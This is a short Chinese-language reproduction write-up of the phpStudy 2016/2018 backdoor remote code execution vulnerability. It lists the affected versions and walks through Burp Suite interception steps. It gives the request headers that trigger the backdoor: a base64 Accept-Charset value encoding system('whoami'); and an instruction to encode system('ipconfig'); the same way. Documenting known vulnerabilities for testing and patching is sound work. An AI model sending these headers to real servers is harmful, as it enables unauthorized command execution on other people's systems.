漏洞描述
攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。RCE(Remote Command|Code Execute)
说明 | 内容 |
漏洞编号 | phpstudy_2016-2018_rce |
漏洞名称 | RCE(Remote Command|Code Execute) |
漏洞评级 | 高危 |
影响范围 | phpStudy 2016 phpStudy 2018 |
漏洞描述 | 攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。 |
漏洞复现
基础环境
组件 | 版本 |
OS | Windows x64 |
Web Server | phpstudy 2016 |
漏洞扫描
win10 打开phpinfo()
启用burp拦截流量
将他发送至重写模块
漏洞触发条件验证
Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=
Accept-Encoding: gzip,deflate
加入两行代码后(注意deflate前的空格 一定要删除)
把system('ipconfig');转换成base64编码
执行出来如图所示